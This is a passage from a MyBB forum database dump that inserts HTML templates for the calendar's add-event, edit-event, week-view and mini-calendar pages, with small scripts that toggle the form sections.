cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->add_event}</strong></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow1\"><strong>{$lang->event_name}</strong></td>\n <td class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"name\" maxlength=\"120\" value=\"{$name}\"/></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow1\"><strong>{$lang->select_calendar}</strong></td>\n <td class=\"trow1\">\n <select name=\"calendar\">\n {$calendar_select}\n </select>\n </td>\n </tr>\n <tr>\n <td class=\"trow2\" style=\"vertical-align: top;\"><strong>{$lang->event_date}</strong></td>\n <td class=\"trow1\">\n <script type=\"text/javascript\">\n <!--\n function toggleType()\n {\n if($(\'type_single\').checked == true)\n {\n Element.hide(\'ranged_selects\');\n Element.show(\'single_selects\');\n }\n else\n {\n Element.hide(\'single_selects\');\n Element.show(\'ranged_selects\');\n toggleRepeats();\n }\n }\n\n function toggleRepeats()\n {\n var repeats = $(\'repeats\').options[$(\'repeats\').selectedIndex].value;\n $$(\'.repeats_type\').each(function(e)\n {\n Element.hide(e);\n });\n if($(\'repeats_type_\'+repeats))\n {\n Element.show(\'repeats_type_\'+repeats);\n }\n }\n // -->\n </script>\n <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\">\n <dt><input type=\"radio\" name=\"type\" value=\"single\" {$type_single} id=\"type_single\" onclick=\"toggleType();\" /> <label for=\"type_single\"><strong>{$lang->type_single}</strong></label></dt>\n <dd style=\"margin-top: 4px;\" id=\"single_selects\">\n <select name=\"single_day\">\n {$single_days}\n </select>\n &nbsp;\n <select name=\"single_month\">\n <option value=\"1\"{$single_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$single_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$single_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$single_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$single_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$single_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$single_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$single_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$single_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$single_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$single_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$single_month[\'12\']}>{$lang->month_12}</option>\n </select>\n &nbsp;\n <select name=\"single_year\">\n {$single_years}\n </select>\n </dd>\n <dt><input type=\"radio\" name=\"type\" value=\"ranged\" {$type_ranged} id=\"type_ranged\" onclick=\"toggleType();\" /> <label for=\"type_ranged\"><strong>{$lang->type_ranged}</strong></label></dt>\n <dd style=\"margin-top: 4px; width: 100%;\" id=\"ranged_selects\">\n <table width=\"100%\">\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->start_time}</td>\n <td style=\"padding: 4px;\">\n <select name=\"start_day\">\n {$start_days}\n </select>\n <select name=\"start_month\">\n <option value=\"1\"{$start_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$start_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$start_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$start_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$start_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$start_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$start_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$start_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$start_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$start_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$start_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$start_month[\'12\']}>{$lang->month_12}</option>\n </select>\n <select name=\"start_year\">\n {$start_years}\n </select>\n <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span>\n <input type=\"text\" class=\"textbox\" name=\"start_time\" value=\"{$start_time}\" size=\"7\" />\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->end_time}</td>\n <td style=\"padding: 4px;\">\n <select name=\"end_day\">\n {$end_days}\n </select>\n <select name=\"end_month\">\n <option value=\"1\"{$end_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$end_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$end_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$end_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$end_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$end_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$end_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$end_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$end_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$end_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$end_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$end_month[\'12\']}>{$lang->month_12}</option>\n </select>\n <select name=\"end_year\">\n {$end_years}\n </select>\n <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span>\n <input type=\"text\" class=\"textbox\" name=\"end_time\" value=\"{$end_time}\" size=\"7\" />\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align: top;\">{$lang->time_zone}</td>\n <td style=\"padding: 4px;\">\n {$timezones}<br />\n <label class=\"smalltext\" style=\"display: block; padding-top: 4px;\"><input type=\"checkbox\" name=\"ignoretimezone\" value=\"1\" {$ignore_timezone} style=\"vertical-align: middle;\" /> {$lang->ignore_timezone} </label>\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right; vertical-align:top;\">{$lang->repeats}</td>\n <td class=\"smalltext\" style=\"padding: 4px;\">\n <select name=\"repeats\" id=\"repeats\" onchange=\"toggleRepeats();\">\n <option value=\"0\">{$lang->does_not_repeat}</option>\n <option value=\"1\"{$repeats_sel[1]}>{$lang->repeats_daily}</option>\n <option value=\"2\"{$repeats_sel[2]}>{$lang->repeats_weekdays}</option>\n <option value=\"3\"{$repeats_sel[3]}>{$lang->repeats_weekly}</option>\n <option value=\"4\"{$repeats_sel[4]}>{$lang->repeats_monthly}</option>\n <option value=\"5\"{$repeats_sel[5]}>{$lang->repeats_yearly}</option>\n </select>\n <div class=\"repeats_type\" id=\"repeats_type_1\" style=\"padding: 4px;\">\n {$lang->repeats_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_1_days\" value=\"{$repeats_1_days}\" size=\"2\" /> {$lang->day_or_days}\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_3\" style=\"padding: 4px;\">\n {$lang->repeats_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_3_weeks\" value=\"{$repeats_3_weeks}\" size=\"2\" /> {$lang->week_or_weeks_on}\n <br />\n <table style=\"padding: 4px;\">\n <tr>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[0]\" value=\"1\" {$repeats_3_days[0]} style=\"vertical-align: middle;\" /> {$lang->sunday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[1]\" value=\"1\" {$repeats_3_days[1]} style=\"vertical-align: middle;\" /> {$lang->monday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[2]\" value=\"1\" {$repeats_3_days[2]} style=\"vertical-align: middle;\" /> {$lang->tuesday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[3]\" value=\"1\" {$repeats_3_days[3]} style=\"vertical-align: middle;\" /> {$lang->wednesday}</label></td>\n </tr>\n <tr>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[4]\" value=\"1\" {$repeats_3_days[4]} style=\"vertical-align: middle;\" /> {$lang->thursday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\"><label><input type=\"checkbox\" name=\"repeats_3_days[5]\" value=\"1\" {$repeats_3_days[5]} style=\"vertical-align: middle;\" /> {$lang->friday}</label></td>\n <td style=\"padding: 2px;\" class=\"smalltext\" colspan=\"2\"><label><input type=\"checkbox\" name=\"repeats_3_days[6]\" value=\"1\" {$repeats_3_days[6]} style=\"vertical-align: middle;\" /> {$lang->saturday}</label></td>\n </tr>\n </table>\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_4\" style=\"padding: 4px;\">\n <div class=\"smalltext\"><label>\n <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_1\" value=\"1\" style=\"vertical-align: middle;\" {$repeats_4_type[1]} />\n {$lang->repeats_on_day}</label>\n <input type=\"text\" class=\"textbox\" name=\"repeats_4_day\" value=\"{$repeats_4_day}\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" size=\"2\" /> {$lang->of_every} <input type=\"text\" class=\"textbox\" name=\"repeats_4_months\" value=\"{$repeats_4_months}\" size=\"2\" onfocus=\"$(\'repeats_4_type_1\').checked=true;\" /> {$lang->month_or_months}\n </div>\n <div class=\"smalltext\" style=\"margin-top: 5px;\"><label>\n <input type=\"radio\" name=\"repeats_4_type\" id=\"repeats_4_type_2\" value=\"2\" style=\"vertical-align: middle;\" {$repeats_4_type[2]} />\n {$lang->repeats_on_the}</label>\n <select name=\"repeats_4_occurance\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\">\n <option value=\"1\"{$repeats_4_occurance[1]}>{$lang->first}</option>\n <option value=\"2\"{$repeats_4_occurance[2]}>{$lang->second}</option>\n <option value=\"3\"{$repeats_4_occurance[3]}>{$lang->third}</option>\n <option value=\"4\"{$repeats_4_occurance[4]}>{$lang->fourth}</option>\n <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option>\n </select>\n <select name=\"repeats_4_weekday\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\">\n <option value=\"0\"{$repeats_4_weekday[0]}>{$lang->sunday}</option>\n <option value=\"1\"{$repeats_4_weekday[1]}>{$lang->monday}</option>\n <option value=\"2\"{$repeats_4_weekday[2]}>{$lang->tuesday}</option>\n <option value=\"3\"{$repeats_4_weekday[3]}>{$lang->wednesday}</option>\n <option value=\"4\"{$repeats_4_weekday[4]}>{$lang->thursday}</option>\n <option value=\"5\"{$repeats_4_weekday[5]}>{$lang->friday}</option>\n <option value=\"6\"{$repeats_4_weekday[6]}>{$lang->saturday}</option>\n </select>\n {$lang->of_every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_4_months2\" value=\"{$repeats_4_months2}\" size=\"2\" onfocus=\"$(\'repeats_4_type_2\').checked=true;\" /> {$lang->month_or_months}\n </div>\n </div>\n <div class=\"repeats_type\" id=\"repeats_type_5\" style=\"padding: 4px;\">\n <div class=\"smalltext\"><label>\n <input type=\"radio\" name=\"repeats_5_type\" value=\"1\" id=\"repeats_5_type_1\" style=\"vertical-align: middle;\" {$repeats_5_type[1]} />\n {$lang->repeats_on}</label>\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_day\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" value=\"{$repeats_5_day}\" size=\"2\" />\n <select name=\"repeats_5_month\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" >\n <option value=\"1\"{$repeats_5_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$repeats_5_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$repeats_5_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$repeats_5_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$repeats_5_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$repeats_5_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$repeats_5_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$repeats_5_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$repeats_5_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$repeats_5_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$repeats_5_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$repeats_5_month[\'12\']}>{$lang->month_12}</option>\n </select>\n {$lang->every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_years\" value=\"{$repeats_5_years}\" onfocus=\"$(\'repeats_5_type_1\').checked=true;\" size=\"2\" /> {$lang->year_or_years}\n </div>\n <div class=\"smalltext\" style=\"margin-top: 5px;\"><label>\n <input type=\"radio\" name=\"repeats_5_type\" value=\"2\" id=\"repeats_5_type_2\" style=\"vertical-align: middle;\" {$repeats_5_type[2]} />\n {$lang->repeats_on_the}</label>\n <select name=\"repeats_5_occurance\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"1\"{$repeats_5_occurance[1]}>{$lang->first}</option>\n <option value=\"2\"{$repeats_5_occurance[2]}>{$lang->second}</option>\n <option value=\"3\"{$repeats_5_occurance[3]}>{$lang->third}</option>\n <option value=\"4\"{$repeats_5_occurance[4]}>{$lang->fourth}</option>\n <option value=\"last\"{$repeats_4_occurance[\'last\']}>{$lang->last}</option>\n </select>\n <select name=\"repeats_5_weekday\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"0\"{$repeats_5_weekday[0]}>{$lang->sunday}</option>\n <option value=\"1\"{$repeats_5_weekday[1]}>{$lang->monday}</option>\n <option value=\"2\"{$repeats_5_weekday[2]}>{$lang->tuesday}</option>\n <option value=\"3\"{$repeats_5_weekday[3]}>{$lang->wednesday}</option>\n <option value=\"4\"{$repeats_5_weekday[4]}>{$lang->thursday}</option>\n <option value=\"5\"{$repeats_5_weekday[5]}>{$lang->friday}</option>\n <option value=\"6\"{$repeats_5_weekday[6]}>{$lang->saturday}</option>\n </select>\n {$lang->of}\n <select name=\"repeats_5_month2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" >\n <option value=\"1\"{$repeats_5_month2[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$repeats_5_month2[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$repeats_5_month2[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$repeats_5_month2[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$repeats_5_month2[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$repeats_5_month2[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$repeats_5_month2[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$repeats_5_month2[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$repeats_5_month2[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$repeats_5_month2[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$repeats_5_month2[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$repeats_5_month2[\'12\']}>{$lang->month_12}</option>\n </select>\n {$lang->every}\n <input type=\"text\" class=\"textbox\" name=\"repeats_5_years2\" value=\"{$repeats_5_years}\" size=\"2\" onfocus=\"$(\'repeats_5_type_2\').checked=true;\" /> {$lang->year_or_years}\n </div>\n </div>\n </td>\n </tr>\n </table>\n </dd>\n </dl>\n <script type=\"text/javascript\">\n <!--\n toggleType();\n toggleRepeats();\n // -->\n </script>\n </td>\n </tr>\n <tr>\n <td valign=\"top\" width=\"20%\" class=\"trow1\"><strong>{$lang->event_details}</strong>{$smilieinserter}</td>\n <td class=\"trow1\"><textarea name=\"description\" id=\"message\" rows=\"20\" cols=\"70\">{$description}</textarea>\n {$codebuttons}</td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow2\"><strong>{$lang->event_options}</strong></td>\n <td class=\"trow2\">\n <input type=\"checkbox\" class=\"checkbox\" name=\"private\" value=\"1\"{$privatecheck} /><span class=\"smalltext\">{$lang->private_option}</span><br />\n </td>\n </tr>\n </table>\n <br />\n <input type=\"hidden\" name=\"action\" value=\"do_addevent\" />\n <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->post_event}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('474', 'calendar_addprivateevent', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}&amp;private=1\">{$lang->add_private_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('475', 'calendar_addpublicevent', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}\">{$lang->add_public_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('476', 'calendar_eventbit_private', '<div style=\"margin-bottom: 4px;\" class=\"smalltext eventbit_private\"><a href=\"{$event[\'eventlink\']}\" title=\"{$event[\'fullname\']}\">{$event[\'name\']}</a></div>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('477', 'calendar_eventbit', '<div style=\"margin-bottom: 4px;\" class=\"smalltext {$event_class}\"><a href=\"{$event[\'eventlink\']}\" title=\"{$event[\'fullname\']}\">{$event[\'name\']}</a></div>', '-2', '1402', '', '1339729416'); INSERT INTO mybb_templates VALUES('478', 'calendar_weekview', '<html>\n<head>\n <title>{$mybb->settings[\'bbname\']} - {$lang->calendar}</title>\n {$headerinclude}\n</head>\n<body>\n {$header}\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tr>\n<td width=\"100%\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"2\">\n <div class=\"float_right\">\n <a href=\"{$prev_link}\">&laquo; {$lang->previous_week}</a> | <a href=\"{$next_link}\">{$lang->next_week} &raquo;</a>\n </div>\n <div><strong>{$lang->weekly_overview} ({$friendly_week_from} - {$friendly_week_to})</strong></div>\n </td>\n </tr>\n </thead>\n <tbody>\n {$weekday_bits}\n </tbody>\n </table>\n</td>\n<td style=\"padding-left: 10px; vertical-align: top;\">{$mini_calendars}</td>\n</tr>\n</table>\n <br />\n <form action=\"calendar.php\" method=\"post\">\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"trow1\">\n <table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n <tr>\n <td class=\"trow1\" valign=\"top\">{$addevent}</td>\n <td class=\"trow1\" align=\"right\">\n <span class=\"smalltext\"><strong>{$lang->jump_month}</strong></span>\n <select name=\"month\">\n <option value=\"{$week_from[1]}\">{$monthnames[$week_from_one]}</option>\n <option value=\"{$week_from[1]}\">----------</option>\n <option value=\"1\">{$lang->alt_month_1}</option>\n <option value=\"2\">{$lang->alt_month_2}</option>\n <option value=\"3\">{$lang->alt_month_3}</option>\n <option value=\"4\">{$lang->alt_month_4}</option>\n <option value=\"5\">{$lang->alt_month_5}</option>\n <option value=\"6\">{$lang->alt_month_6}</option>\n <option value=\"7\">{$lang->alt_month_7}</option>\n <option value=\"8\">{$lang->alt_month_8}</option>\n <option value=\"9\">{$lang->alt_month_9}</option>\n <option value=\"10\">{$lang->alt_month_10}</option>\n <option value=\"11\">{$lang->alt_month_11}</option>\n <option value=\"12\">{$lang->alt_month_12}</option>\n </select>\n <select name=\"year\">\n <option value=\"{$week_from[2]}\">{$week_from[2]}</option>\n <option value=\"{$week_from[2]}\">----------</option>\n {$yearsel}\n </select>\n {$gobutton}\n <br /><br />\n <span class=\"smalltext\"><strong>{$lang->jump_to_calendar}</strong></span>\n {$calendar_jump}\n {$gobutton}\n </td>\n </tr>\n </table>\n </td>\n </tr>\n </table>\n </form>\n{$footer}\n</body>\n</html>', '-2', '1603', '', '1339729416'); INSERT INTO mybb_templates VALUES('479', 'calendar_weekview_month', ' <tr>\n <td class=\"tcat\" colspan=\"2\"><strong>{$weekday_month} {$weekday_year}</strong></td>\n </tr>\n {$days}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('480', 'calendar_weekview_day', ' <tr>\n <td class=\"trow_sep\" colspan=\"2\">{$weekday_name}</td>\n </tr>\n <tr>\n <td class=\"trow2{$day_shaded}\" style=\"text-align: center; padding: 8px;\"><span class=\"largetext\">{$weekday_day}</span></td>\n <td class=\"trow1\" width=\"100%\">{$day_birthdays}{$day_events}</td>\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('481', 'calendar_weekview_day_event', '<a href=\"{$event[\'eventlink\']}\" class=\"{$event_class}\" title=\"{$event[\'fullname\']}\">{$event[\'fullname\']}</a>{$event_time}<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('482', 'calendar_mini', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"width: 180px;\">\n <thead>\n <tr>\n <td class=\"thead\" colspan=\"8\">\n <strong><a href=\"{$month_link}\">{$monthnames[$month]} {$year}</a></strong>\n </td>\n </tr>\n <tr>\n <td class=\"tcat\">&nbsp;</td>\n {$weekday_headers}\n </tr>\n </thead>\n <tbody>\n {$calendar_rows}\n </tbody>\n</table>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('483', 'calendar_mini_weekdayheader', ' <td class=\"tcat\" align=\"center\" width=\"14%\"><strong>{$weekday_name}</strong></td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('484', 'calendar_mini_weekrow', ' <tr>\n <td class=\"tcat\" align=\"center\" width=\"1\"><a href=\"{$week_link}\">&raquo;</a></td>\n {$day_bits}\n </tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('485', 'calendar_mini_weekrow_day', ' <td class=\"{$day_class}\" valign=\"middle\" align=\"center\">\n {$day_link}\n </td>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('486', 'calendar_addeventlink', '<a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}\">{$lang->add_public_event}</a> | <a href=\"calendar.php?action=addevent&amp;calendar={$calendar[\'cid\']}&amp;private=1\">{$lang->add_private_event}</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('487', 'calendar_editevent', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->calendar} - {$lang->edit_event}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$event_errors}\n<form action=\"calendar.php\" method=\"post\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"3\"><strong>{$lang->delete_event}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" style=\"white-space: nowrap\"><input type=\"checkbox\" class=\"checkbox\" name=\"delete\" value=\"1\" tabindex=\"9\" /> <strong>{$lang->delete_q}</strong></td>\n <td class=\"trow1\" width=\"100%\">{$lang->delete_1}<br /><span class=\"smalltext\">{$lang->delete_2}</span></td>\n <td class=\"trow1\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_now}\" tabindex=\"10\" /></td>\n </tr>\n </table>\n <input type=\"hidden\" name=\"action\" value=\"do_editevent\" />\n <input type=\"hidden\" name=\"eid\" value=\"{$event[\'eid\']}\" />\n</form>\n<br />\n<form action=\"calendar.php\" method=\"post\" name=\"input\">\n <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n <tr>\n <td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->edit_event}</strong></td>\n </tr>\n <tr>\n <td width=\"20%\" class=\"trow1\"><strong>{$lang->event_name}</strong></td>\n <td class=\"trow1\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"name\" maxlength=\"120\" value=\"{$name}\"/></td>\n </tr>\n <tr>\n <td class=\"trow2\" style=\"vertical-align: top;\"><strong>{$lang->event_date}</strong></td>\n <td class=\"trow1\">\n <script type=\"text/javascript\">\n <!--\n function toggleType()\n {\n if($(\'type_single\').checked == true)\n {\n Element.hide(\'ranged_selects\');\n Element.show(\'single_selects\');\n }\n else\n {\n Element.hide(\'single_selects\');\n Element.show(\'ranged_selects\');\n toggleRepeats();\n }\n }\n\n function toggleRepeats()\n {\n var repeats = $(\'repeats\').options[$(\'repeats\').selectedIndex].value;\n $$(\'.repeats_type\').each(function(e)\n {\n Element.hide(e);\n });\n if($(\'repeats_type_\'+repeats))\n {\n Element.show(\'repeats_type_\'+repeats);\n }\n }\n // -->\n </script>\n <dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\">\n <dt><input type=\"radio\" name=\"type\" value=\"single\" {$type_single} id=\"type_single\" onclick=\"toggleType();\" /> <label for=\"type_single\"><strong>{$lang->type_single}</strong></label></dt>\n <dd style=\"margin-top: 4px;\" id=\"single_selects\">\n <select name=\"single_day\">\n {$single_days}\n </select>\n &nbsp;\n <select name=\"single_month\">\n <option value=\"1\"{$single_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$single_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$single_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$single_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$single_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$single_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$single_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$single_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$single_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$single_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$single_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$single_month[\'12\']}>{$lang->month_12}</option>\n </select>\n &nbsp;\n <select name=\"single_year\">\n {$single_years}\n </select>\n </dd>\n <dt><input type=\"radio\" name=\"type\" value=\"ranged\" {$type_ranged} id=\"type_ranged\" onclick=\"toggleType();\" /> <label for=\"type_ranged\"><strong>{$lang->type_ranged}</strong></label></dt>\n <dd style=\"margin-top: 4px; width: 100%;\" id=\"ranged_selects\">\n <table width=\"100%\">\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->start_time}</td>\n <td style=\"padding: 4px;\">\n <select name=\"start_day\">\n {$start_days}\n </select>\n <select name=\"start_month\">\n <option value=\"1\"{$start_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$start_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$start_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$start_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$start_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$start_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$start_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$start_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$start_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$start_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$start_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$start_month[\'12\']}>{$lang->month_12}</option>\n </select>\n <select name=\"start_year\">\n {$start_years}\n </select>\n <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span>\n <input type=\"text\" class=\"textbox\" name=\"start_time\" value=\"{$start_time}\" size=\"7\" />\n </td>\n </tr>\n <tr>\n <td class=\"smalltext\" style=\"padding: 4px; text-align: right;\">{$lang->end_time}</td>\n <td style=\"padding: 4px;\">\n <select name=\"end_day\">\n {$end_days}\n </select>\n <select name=\"end_month\">\n <option value=\"1\"{$end_month[\'1\']}>{$lang->month_1}</option>\n <option value=\"2\"{$end_month[\'2\']}>{$lang->month_2}</option>\n <option value=\"3\"{$end_month[\'3\']}>{$lang->month_3}</option>\n <option value=\"4\"{$end_month[\'4\']}>{$lang->month_4}</option>\n <option value=\"5\"{$end_month[\'5\']}>{$lang->month_5}</option>\n <option value=\"6\"{$end_month[\'6\']}>{$lang->month_6}</option>\n <option value=\"7\"{$end_month[\'7\']}>{$lang->month_7}</option>\n <option value=\"8\"{$end_month[\'8\']}>{$lang->month_8}</option>\n <option value=\"9\"{$end_month[\'9\']}>{$lang->month_9}</option>\n <option value=\"10\"{$end_month[\'10\']}>{$lang->month_10}</option>\n <option value=\"11\"{$end_month[\'11\']}>{$lang->month_11}</option>\n <option value=\"12\"{$end_month[\'12\']}>{$lang->month_12}</option>\n </select>\n <select name=\"end_year\">\n {$end_years}\n </select>\n <span class=\"smalltext\">&nbsp;&nbsp;&nbsp;{$lang->enter_time}</span>\n <input type=\"text\" class=\"textbox\" name=\"end_time\" 